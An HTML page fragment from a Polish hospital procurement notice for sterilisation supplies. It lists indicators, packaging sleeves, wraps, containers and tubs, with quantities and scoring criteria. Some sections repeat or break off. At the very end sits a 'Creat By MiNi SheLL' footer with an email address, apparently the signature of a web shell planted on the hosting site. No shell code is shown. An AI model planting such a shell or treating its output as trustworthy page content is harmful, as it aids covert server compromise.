parowych wszystkich typów. Parametry 134oC/7 min - 121oC/20 min. Oznaczenie daty przydatności do użycia na każdym wskaźniku. Wynik testu jest natychmiastowy i łatwy w interpretacji- prawidłowy przebieg procesu sterylizacji sygnalizowany wyraźną zmianą koloru emulatora - test zawiera pole porównawcze z określonym kolorem wskaźnika po sterylizacji.	30 op. x 200 szt.9	Test chemiczny klasy 6 emulacyjny stosowany do oceny parametrów krytycznych procesu sterylizacji nasyconą parą wodną w sterylizatorach parowych wszystkich typów. Parametry 134oC/5,5 min. Oznaczenie daty przydatności do użycia na każdym wskaźniku Wynik testu jest natychmiastowy i łatwy w interpretacji - prawidłowy przebieg procesu sterylizacji sygnalizowany wyraźną zmianą koloru emulatora - test zawiera pole porównawcze z określonym kolorem wskaźnika po sterylizacji.	30 op. x 200 szt.10	Metkownica trzyrzędowa do oznaczania pakietów typu Blitz	1 szt.11	Etykiety do metkownicy trzyrzędowej typu BLITZ, dwukrotnie przylepne ze wskaźnikiem sterylizacji parowej (kod producenta - 3789), zawierające opisane pola umożliwiające wprowadzenie danych: daty sterylizacji, daty ważności,nr sterylizatora, nr cyklu, nr operatora.	200 rolek x 500 szt.12	Rolka tuszująca do metkownicy trzyrzędowej typu BLITZ , dł. 4 cm., szerokość 2,5 cm.	5 szt.13	Test kontroli zgrzewu do zgrzewarki typu Hawo (posiadanej przez Zamawiającego)	2 000 szt.14	Rolka tuszująca do zgrzewarki typu Hawo - FARBBAND NYLON SCHWARZ 13 MM; HM 750-3020; 6.813.104 - wymagana oryginalna	50 szt.15	Kaseta do drukarki typu CBM-920 do sterylizatora parowego typu AS 666WPA	50 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33191000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">35,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 2Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	1.	A -Warunki przechowywania testu przed użyciem	0 -10	Test wymaga<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Pakiet 3 - Rękawy polyolefinowe, papier do wykładania tac narzędziowych </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PAKIET 3 - Rękawy polyolefinowe, papier do wykładania tac narzędziowychOpis przedmiotu zamówienia	Przewidywane zużycieRękaw folia-polyolefin płaski (para),	42 cm x 70 m	40	32 cm x 70 m	15	27 cm x 70 m	20	21 cm x 70 m	20	16 cm x 70 m	40Papier do wykładania tac narzędziowych wchłaniający wilgoć	30 x 30 cm	2 000 szt.	30 x 40 cm	4 000 szt.	35 x 58 cm	2 000 szt.TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 3Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	1	A -Gramatura rękawa 0-35	< 90 g/m?.	O pkt ? 90 g/m?.	35 pkt PAKIET 3 - Rękawy polyolefinowe, papier do wykładania tac narzędziowychOpis przedmiotu zamówienia	Przewidywane zużycieRękaw folia-polyolefin płaski (para),	42 cm x 70 m	40	32 cm x 70 m	15	27 cm x 70 m	20	21 cm x 70 m	20	16 cm x 70 m	40Papier do wykładania tac narzędziowych wchłaniający wilgoć	30 x 30 cm	2 000 szt.	30 x 40 cm	4 000 szt.	35 x 58 cm	2 000 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33191000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">35,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 3Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	1	A -Gramatura rękawa 0-35	< 90 g/m?.	O pkt ? 90 g/m?.	35 p<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Pakiet 4 - Asortyment opakowaniowy i chłonny </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PAKIET 4 - Asortyment opakowaniowy i chłonnyLp.	Opis przedmiotu zamówienia	Przewidywane zużycie1	Rękaw foliowo - papierowy płaski (para-tlenek)	50 mm x 200 m	20 szt. 75 mm x 200 m	50 szt. 100 mm x 200 m	80 szt. 120 mm x 200 m	40 szt. 150 mm x 200 m	40 szt. 200 mm x 200 m	20 szt. 250 mm x 200 m	20 szt. 300 mm x 200 m	10 szt.2	Rękaw foliowo - papierowy z fałdą (para-tlenek),	75 mm x 25 mm x 100 m	5 szt. 100 mm x 40 mm x 100 m	5 szt. 150 mm x 40 mm x 100 m	30 szt. 200 mm x 60 mm x 100 m	5 szt. 250 mm x 60 mm x 100 m	5 szt. 300 mm x 80 mm x 100 m	4 szt. 400 mm x 80 mm x 100 m	2 szt.3	Papier krepowy, gramatura min. 60 g /m? (naprzemiennie pakowany kolorami)	1000 x 1000 mm	4 op. x 250 szt. 750 x 750 mm	4 op. x 250 szt. 600 x 600 mm	4 op. x 500 szt.4	Chłonne arkusze absorpcyjne	305 x 457 mm	1 000 szt 305 x 610 mm	1 000 szt.5	Materiał opakowaniowy przeznaczony do ciężkich zestawów z dodatkową warstwa absorpcyjną	100 x 100 cm	500 szt6	Włóknina	90 x 90 cm	2000 szt.7	Pisak do opisywania zestawów narzędziowych 10 szt.Uwagi do PAKIETU 4:Pozycja 1,2:1)	Opakowania zgodne z normą PN EN 868 i ISO 11607, w komplecie karta techniczna wystawiona przez producenta (nie dystrybutora) papieru i folii zawierająca zalecenia użytkowe; dokument potwierdzający brak cytotoksyczności w oparciu o laboratoryjne badania wg ISO 10993-5;2)	Gramatura min 60 g /m?;3)	Napisy i wskaźniki umieszczone poza obszarem wypełnienia, między warstwami folii, folia minimum 5 warstwowa, zgrzew fabryczny jednolity dla wszystkich wymaganych rozmiarów rękawów, - 3-kanałowy, na każdym rękawie ( na linii zgrzewu fabrycznego od strony folii) umieszczony rozmiar nominalny (długość, szerokość), kierunek otwierania, LOT, nazwa producenta, oznaczenie normy. Substancja wskaźnikowa naniesiona jednolicie, bez przerw, szlaczków itp.4)	Znak CE oraz znak określający produkt jednokrotnego użytku tylko na opakowaniu zbiorczym, nie dopuszcza się tego oznakowania na rękawie;5)	Każda rolka rękawa zabezpieczona folią wraz z etykieta produktu zawierającą między innymi informację o rozmiarze, numerze LOT, dacie ważności, warunkach przechowywanie (temperatura, wilgotność) umożliwiająca archiwizację danych systemu bariery sterylnej;Pozycja 3:1)	Papier krepowany I generacji - 100% włókno celulozowe;2)	Wytrzymałość na rozciąganie liniowe na sucho i w kierunku walcownia nie mniej niż 2,1 kN/m, w kierunku poprzecznym nie mniej niż 1,6 kN/m, wytrzymałość na rozciąganie liniowe na mokro w kierunku walcownia nie mniej niż 0,8 kN/m, w kierunku poprzecznym nie mniej niż 0,5 kN/m;3)	Gramatura nominalna 60g/m?.Pozycja 4:1)	Wysokochłonne papierowe wkładki absorpcyjne o grubości co najmniej 270µg., gramaturze nie mniejszej niż 80g/m?, absorpcja wody nie mniejsza niż 120 g/m?;2)	Możliwość stosowania w sterylizatorach parowych i na tlenek etylenu;3)	zawartość chlorków nie większa niż 0,04% i siarczanów nie większa niż 0,07%Pozycja 5:1)	Materiał opakowaniowy do sterylizacji składający się z trzech różnych warstw - warstwy wykonanej z podłużnych włókien polipropylenowych odpowiedzialnej za wytrzymałość materiału, warstwy stanowiącej barierę sterylną oraz warstwy absorpcyjnej;2)	Gramatura ? 70 g/m2;3)	Możliwość stosowania w sterylizatorach parowych i na tlenek etylenu;4)	Kolor zielony, materiał zgodny z wymogami normy EN ISO 11607-1 i EN 868-2, kolor zielonyPozycja 6:1.	Włóknina sterylizacyjna III generacji- celuloza wiązana powierzchniowo, wzmocniona włóknem syntetycznym i mikrokrepowana; wykonana zgodnie z normami zharmonizowanymi z dyrektywą o wyrobach medycznych, tzn. EN ISO 11607-1 i ISO 11607-2;2.	wytrzymałość na rozciąganie linowe na sucho w kierunku walcowania nie mniej niż 2,5 kN/m, w kierunku poprzecznym nie mniej niż 1,1 kN/m, wytrzymałość na rozciąganie linowe na mokro w kierunku walcowania nie mniej niż 2,1 kN/m w kierunku poprzecznym nie mniej niż 0,9 kN/m;3.	wytrzymałość na przepuklenie nie mniej niż 240 kPa na sucho i 110 kPa na mokro, wytrzymałość na rozdarcie nie mniej niż 1300mN w kierunku walcowania oraz niemniej niż 2000 mN w kierunku poprzecznym;Pozycja 7:1)	permanentny marker do opisywania powierzchni tac, rękawów;2)	tusz w kolorze czarnym odporny na czynniki sterylizacyjne (STEAM), nietoksyczny, szybkoschnący.TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 4Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	3.	A - Kolory papieru krepowego naprzemiennie pakowane	0-15	Dowolny kolor naprzemiennie pakowanego papieru krepowego	O pkt Kolor biały i zielony naprzemiennie pakowanego papieru krepowego	15 pkt2.	6	B -Kolor dostarczonej włókniny	0-10	Dowolny kolor włókniny	O pkt Kolor zielony włókniny	10 pkt3.	6	C -Gramatura włókniny	0-10	< 66 g/m?.	O pkt >, = 66 g/m?.	10 pkt PAKIET 4 - Asortyment opakowaniowy i chłonnyLp.	Opis przedmiotu zamówienia	Przewidywane zużycie1	Rękaw foliowo - papierowy płaski (para-tlenek)	50 mm x 200 m	20 szt. 75 mm x 200 m	50 szt. 100 mm x 200 m	80 szt. 120 mm x 200 m	40 szt. 150 mm x 200 m	40 szt. 200 mm x 200 m	20 szt. 250 mm x 200 m	20 szt. 300 mm x 200 m	10 szt.2	Rękaw foliowo - papierowy z fałdą (para-tlenek),	75 mm x 25 mm x 100 m	5 szt. 100 mm x 40 mm x 100 m	5 szt. 150 mm x 40 mm x 100 m	30 szt. 200 mm x 60 mm x 100 m	5 szt. 250 mm x 60 mm x 100 m	5 szt. 300 mm x 80 mm x 100 m	4 szt. 400 mm x 80 mm x 100 m	2 szt.3	Papier krepowy, gramatura min. 60 g /m? (naprzemiennie pakowany kolorami)	1000 x 1000 mm	4 op. x 250 szt. 750 x 750 mm	4 op. x 250 szt. 600 x 600 mm	4 op. x 500 szt.4	Chłonne arkusze absorpcyjne	305 x 457 mm	1 000 szt 305 x 610 mm	1 000 szt.5	Materiał opakowaniowy przeznaczony do ciężkich zestawów z dodatkową warstwa absorpcyjną	100 x 100 cm	500 szt6	Włóknina	90 x 90 cm	2000 szt.7	Pisak do opisywania zestawów narzędziowych 10 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33191000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">35,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Uwagi do PAKIETU 4:Pozycja 1,2:1)	Opakowania zgodne z normą PN EN 868 i ISO 11607, w komplecie karta techniczna wystawiona przez producenta (nie dystrybutora) papieru i folii zawierająca zalecen<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Pakiet 5 - Pojemniki transportowe, wanny dezynfekcyjne</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PAKIET 5 - Pojemniki transportowe, wanny dezynfekcyjneOpis przedmiotu zamówienia	Przewidywane zużyciePojemnik transportowy	400 x 300 x 220 mm - zew.287x 232 x 200 - wew.	3 szt	600 x 400 x 329 mm - zew.458 x 318 x 311 mm - wew	1 sztWanna do dezynfekcji narzędzi z kranikiem	A x B x H = 620 x 405 x 240 mm. - zew;A x B x H = 560 x 370 x 223 mm. - wew A x B x H = 550 x 359 x 200 mm. - wew sita	1 sztWanna do dezynfekcji narzędzi	A x B x H = 300 x 150 x 100 mm- wew	1 sztPunkt 1:1)	szczelnie zamykany pojemnik transportowy wykonany ze 100% polipropylenu, zapewniający bezpieczny transport czystych narzędzi;2)	Waga nie większa niż 1400 g, pojemność ok. 16 litrów;3)	Wytrzymała pokrywa wykonana z tego samego materiału co cały pojemnik, umożliwiająca piętrowe układanie pojemników;4)	Pojemniki wytrzymują proces dezynfekcji termicznej w myjni-dezynfektorze w temp. do 95oC.Punkt 2:1)	wanna z polipropylenu, wkładka-sito, przycisk do narzędzi korek odpływowy, pokrywa;2)	pojemność użytkowa: 30 l.;3)	podziałka na ściance wewnętrznej;4) łatwy demontaż części składowych - łatwe utrzymanie w czystości,prosta i estetyczna budowa, odporność mechaniczna, nie przebarwiają si? w czasie stosowania różnych preparatów;5)	sito umożliwiające wyjście dezynfekowanych narzędzi z roztworu w celu płukania ich pod wodą;Punkt 3:1)	wanna biała z polipropylenu, przeźroczysta pokrywa z makrolonu, wkładka-sito z PCV;2)	pojemność użytkowa: 2 l.TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 5Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	1	A -Kolor pojemnika transportowego	0-20	Dowolny kolor	O pkt Niebieski kolor	20 pkt2.	2	B -Kolor wanny do dezynfekcji narzędzi	0-15	Dowolny kolor	O pkt Biały kolor	15 pkt PAKIET 5 - Pojemniki transportowe, wanny dezynfekcyjneOpis przedmiotu zamówienia	Przewidywane zużyciePojemnik transportowy	400 x 300 x 220 mm - zew.287x 232 x 200 - wew.	3 szt	600 x 400 x 329 mm - zew.458 x 318 x 311 mm - wew	1 sztWanna do dezynfekcji narzędzi z kranikiem	A x B x H = 620 x 405 x 240 mm. - zew;A x B x H = 560 x 370 x 223 mm. - wew A x B x H = 550 x 359 x 200 mm. - wew sita	1 sztWanna do dezynfekcji narzędzi	A x B x H = 300 x 150 x 100 mm- wew	1 szt<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33191000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">35,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Punkt 1:1)	szczelnie zamykany pojemnik transportowy wykonany ze 100% polipropylenu, zapewniający bezpieczny transport czystych narzędzi;2)	Waga nie większa niż 1400 g, pojemność ok. 16 litrów;3)<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com